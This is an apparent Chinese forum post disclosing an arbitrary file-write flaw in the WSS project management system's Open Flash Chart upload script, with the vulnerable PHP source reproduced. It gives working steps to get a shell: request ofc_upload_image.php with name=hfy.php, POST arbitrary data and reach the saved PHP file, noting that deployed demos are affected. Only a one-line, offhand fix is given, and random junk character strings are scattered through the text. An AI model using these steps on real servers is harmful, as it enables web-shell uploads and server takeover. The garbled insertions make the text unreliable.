WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
$ O8 N9 `9 q1 t# O. e, r0 Z 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
" ]( p4 O' J5 c: u) c" Q
$ @' A1 F4 S$ U; c/ g* D9 |利用：
, @1 @2 T6 v0 ?1 r  @/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名

Post任意数据
+ X8 R4 S" P4 n0 r: W5 `. B8 P保存位置http://localhost/chart/tmp-upload-images/hfy.php


5 h' a. W6 @5 U最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~

<?php

//
, y+ Y9 M' F4 R, H$ H+ o+ _// In Open Flash Chart -> save_image debug mode, you
* C* C* p, u7 e  \7 h% }  K// will see the 'echo' text in a new window.
//

/*
! B2 y' g( }9 s( e8 Q  b- N0 b
print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );
5 N' Q3 k/ G7 ]
print_r( $GLOBALS );
# p3 K3 G0 K" p9 s  hprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
0 I: f( w" H  D8 {
*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

+ \- ~& v# d3 _, t7 }if (!file_exists($default_path)) mkdir($default_path, 0777, true);
5 z5 ]( }* v+ t1 ^+ n
3 c: t5 _7 D' m7 L// full path to the saved image including filename //
  S* B  I) V" W/ j3 Y& M$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
; q0 p2 h! T8 k# |* N- F// print_r( $_POST );
// print_r( $_SERVER );
# z% y0 M% w  Y! h" \. B. s& V// echo $HTTP_RAW_POST_DATA;

//
/ z: ?; [+ Y& o// POST data is usually string data, but we are passing a RAW .png
' r1 B1 I$ J/ w+ e& q* ~// so PHP is a bit confused and $_POST is empty. But it has saved
* D- m( ~2 s2 Q: R" ^# K// the raw bits into $HTTP_RAW_POST_DATA
% l) d8 m1 B5 Y' J* i//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);
2 G, d: t# Z% i: u% u4 |1 n
0 ^, t" W* s3 }, F//
3 n; ?5 [9 R% I" A1 @. z! v0 h// LOOK:
//
exit();
//
; c, ?1 g3 ]" ]  R$ U2 V// PHP5:
//
6 `  A) M/ C6 d7 n* z& i
( B' t% Z* e0 b  _- w8 T. A2 N2 d
// default path for the image to be stored //
$default_path = 'tmp-upload-images/';
8 V3 Y" Q) c) b. a. @
3 U( \% q* I' S) z8 }7 q( l+ Iif (!file_exists($default_path)) mkdir($default_path, 0777, true);
5 O# S) U. @! i. V' I, D
// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
/ r+ H/ \( ]# D: u% U# t3 h
// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}
9 r6 Z5 k4 X9 V$ S6 o

?>

8 ^& i! c) b" f5 ?. T
4 a0 a5 ^3 m0 B* R+ A: w" L
0 Z3 J+ s1 B7 y+ b8 I* S& j5 B- F
6 b' B- s' X: z0 l9 I' ?3 V2 U

% G+ a2 t+ d0 p. O- L9 _修复方案：
8 \5 \' s9 Q$ ^! Q( W8 Y* g" p这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞
6 C4 o( E8 k5 ?( W/ [



' r- T# b. ?0 l3 N  u. m